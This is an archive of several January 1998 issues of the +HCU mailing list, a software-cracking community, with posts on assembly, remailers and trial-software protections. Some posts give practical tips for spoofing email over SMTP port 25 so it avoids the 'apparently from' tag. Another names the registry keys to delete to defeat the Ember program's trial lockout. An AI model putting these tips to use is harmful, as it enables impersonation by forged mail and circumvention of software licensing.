question that i noticed in the past and never really checked out - but heck maybe one of you have run across a solution (other than just putting a fake return address in netscape or using a remailer) when using telnet (host) at port 25 to send email, often, servers will put a message on your emails when you send them... 'apparently from...' which is clearly the mark of a spoofed message has anyone heard of a way to keep it from doing this? or is it as i suspect that you just need a different server... if this is a simple solution that i just overlooked no problem :) when i taught myself C way back when i missed some important small bits that i learned after working with data structures, kinda like learning division before addition... (such is often the case with self teaching) thanks in advance and take care all +gthorne -----#5------------------------------------------------- Subject: Re: Stuck with Everlock forwarded pupil (fravia+) -------------Forwarded Message----------------- From: Clark1d, ************************ To: , 100114,453 Date: 15-01-98 5:17 RE: Re: Stuck with Everlock Sender: *************** Received: from imo11.mx.aol.com (imo11.mx.aol.com [198.81.19.165]) by arl-img-1.compuserve.com (8.8.6/8.8.6/2.10) with ESMTP id XAA09146 for **************************** Wed, 14 Jan 1998 23:16:55 -0500 (EST) From: Clark1d ***************** Message-ID: *************************** Date: Wed, 14 Jan 1998 22:53:52 EST To: ************************* Subject: Re: Stuck with Everlock Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7bit Organization: AOL ******************** X-Mailer: Inet_Mail_Out (IMOv11) Fravia - I really appreciate the response (and the encouragement). In many of +Orc's essays, he mentioned that a newbie such as me should pair up with a vet for help and hints. Do you know if any of the students would like to volunteer. I am sure everyone is rather busy, so I would try to not take much of their time. I believe that a little help early on will really give me a jumpstart. Also, I have obtained a great deal of information about assembly programming and I am ingesting it as fast as I can. Thanks David -----#6------------------------------------------------- Subject: Anonymous Remailers >(this tricks are only for SENDING mail, since receiving is not that >much a problem) Really? I find it the other way around. Safely receiving mail can be a real headache and quite inconvenient when using nymservers. >Note: Attention, you're NOT 100%ly untraceable, since some Wingates log >such activity. (most do not, though). Yes. You should use anonymous remailers. I use ******************* for my Ghiribizzo persona. It's only a type I remailer as this persona is only low security but you can use type II (mixmaster) remailers if you need higher security. You can get a list from the internet somewhere (do search +remailer +anonymous). Almost all are run by people who believe in privacy and are therefore not logged. A lot also support PGP encryption and other tricks. >You can send email by telnetting to a mailserver to >port 25 (telnet victim.com 25) and then using the SMTP commands. You can also telnet to POP3 servers to collect mail. Commands are: USER username PASS password RETR # retrieve message number # DELE # delete message number # QUIT There are others (look for RFC) but these should get you through. I telnet directly as I use some computers which have only telnet and netscape loaded and netscape takes an eternity to load via network. ~~ Ghiribizzo =====End of Issue 117=================================== ======================================================== +HCU Maillist Issue: 118 01/17/1998 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** Web Repository.........................hcuml.home.ml.org ======================================================== CONTENTS: #1 Subject: ourprot.zip #2 Subject: Ember ARTICLES: -----#1------------------------------------------------- Subject: ourprot.zip Did anyone download ourprot.zip? Mine wasn't complete and when I tried to finish the d/l on my next session, I found that it had been removed (possibly because Quine had cracked the 'heavy' protection?). Was the zip useful? If so, could you please send a copy to me via email. The trouble with the net is that everything seems to have such a short lifespan. I remember trying to find OLDER versions of W32Dasm to have a look at and all the FTP sites seem to be up to date and don't keep older versions. Tip: use web sites which are updated infrequently. I tried one of Fravia's mirrors but the last update was in November! ~~ Ghiribizzo -----#2------------------------------------------------- Subject: Ember As coincidence may have it I was messing around with Ember also. I thought that it was a very interesting reaction to failed crack attemps. After the first lock out if you uninstall and reinstall it, you will be able to access it but the trial period will be expired. If you continue fail to crack it again it will go itno what it calls "Self-Defense" Mode and won't even enter the program. I find it kinda interesting that it says the policy for registering it after this happens is "No Questions Asked". If you try to unistall/reinstall now it won't let you in. I tried for a bit to figure out how it checked for Self-Defense mode using File Monitor and Reg Monitor but didn't see anything that looked suspicious. This was going to be my first crack but I think I may be in over my head. Any suggestions on how the program may detect that it's in Self-Defense mode after reintsalling? Joe Dark =====End of Issue 118=================================== ======================================================== +HCU Maillist Issue: 119 01/18/1998 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** Web Repository.........................hcuml.home.ml.org ======================================================== CONTENTS: #1 Subject: firehand #2 Subject: ember #3 Subject: finding program entry points #4 Subject: smtp port 25 #5 Subject: none ARTICLES: -----#1------------------------------------------------- Subject: firehand I haven't seen a protection that threatens to wipe your HD before. My initial feelings is that it is a bluff, but I think the legality of such an action may be more interesting than it's implementation. ~~ Ghiribizzo -----#2------------------------------------------------- Subject: ember it isn't so hard just delete the HKLM/software/microsoft/windows/msofc & HKLM/software/fireworx/ember/ key & user entries from the registry i don't think it really deletes stuff btw. +SNiKkEL -----#3------------------------------------------------- Subject: finding program entry points i.e. press F4, F3, F8. ~~ -----#4------------------------------------------------- Subject: smtp port 25 The 'apparently from..' tag gets added when the SMTP is not adhered to. Usually due to forgetting the 'from' bit of the header or (easier to forget) the HELO part of the protocol. If you're writing a program to spoof mail automatically, you'll need to put in some checking for 'mis-sent' commands. For some reason, however, the first command usually is not received properly - this corresponds (usually) to the HELO command. I suspect this is why you are getting the 'apparently from' tags. I'm writing this from memory as it has been several years since I spoofed email. There are probably some FAQs on the net somewhere (I wrote one in a previous persona - it may still be kicking around). I hope this helps. If you still can't get it to work, please email me and I'll look into it as I have definitely sent fake mail which didn't have the tags. ~~ Ghiribizzo -----#5------------------------------------------------- Subject: none Friends: Most of you are aware that I solved the +ORC riddle a few months ago. We've all been waiting for Basilisk to post the story on his web pages, but he's been very busy with his work, and hasn't had the time to complete his writings. While we were waiting on the Basilisk, it seems our +teacher has decided to change the rules at the end of the game. Now, we must also become hackers if we are going to see the solution to +his riddle. The riddle points to a particular server, once you locate that server, you must find a web page ("gate") on it. Actualy, there are TWO web pages ("gates"), and I located both of them, but you only have to find one of them to continue to +Orcs web-site. Once you've located the "gate(s)", you find the +ORC link on the web page, and click it, to get to another server. But you're not at +Orcs web page yet, so you must search this second server to finaly find +his web pages. Some of you were lucky enough to view these "gates", because I've told a few people where they were, and I'm sure the Basilisk has also, but for those of you who were not that lucky, it's time to brush up on your hacking skills. For some reason, BOTH of the "gates" have been re-named, and now you'll need a login/password to view them. Since I'm not a hacker, I don't know if they still contain the link to the geocities server, but maybe if you ever hack your way in, you'll let me know. As you'll learn, when the Basilisk gets the story posted on his web site, I've known about these "gates" for a year and a half. I've visited them often, because they contain a wealth of information. They were designed for hackers and crackers, and there was no need to re-name them, or block access, because they are legendary on the net. I did not tell anyone about them because I thought that +Orcs web site was the treasure to be found, not the "gates". Perhaps +he did this for security reasons, or maybe this is his way of telling us the final solution to the riddle HAS been found, since he never realy came right out and said so, who knows? Whatever the reason, my time is too limited to play this game when the rules change mid-stream. Anyone wishing to continue this game can contact me for any information I have, except for +his real name, e-mail address, real address, and picture. You'll have to "prove" that you're actualy working on the riddle by telling me what you've found, I don't want to "give" the information to lamers so they can take credit for my hard work. The rest will be up to you, until the rules change again. Hackmore Readrite Data Miners Inc. =====End of Issue 119=================================== ======================================================== +HCU Maillist Issue: 120 01/19/1998 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** Web Repository.........................hcuml.home.ml.org ======================================================== CONTENTS: #1 Subject: Hcu Repository #2 Subject: Assembly ARTICLES: -----#1------------------------------------------------- Subject: Hcu Repository Hi Everyone.. I have been using a JDK 1.1 patched version of Netscape for a while now, and the HCU test search applet was tested using that. I recently went to the applet page using a JDK 1.0 browser, only to find it didn't work... If someone had told me sooner, I could have made the fix in a few seconds.(Only needed to change a couple of lines) I can only assume 1) No-one cares 2) No one checked the page 3) Every one assumes I am a terrible programmer :( Anyway, it works now.(Tested with Netscape 4) The link is: *************************************************** Please send comments, EVEN IF IT DOESN'T WORK! +Alt-F4 -----#2------------------------------------------------- Subject: Assembly I'm still learning assembly and there is something that I'm not sure of. The TEST command. It compares two things bit by bit and sets Z to 1 if it's the same right? I see this line in programs all the time, TEST AL, AL and sometimes Z = 1 and sometimes not. Can someone explain this to me? Joe Dark =====End of Issue 120===================================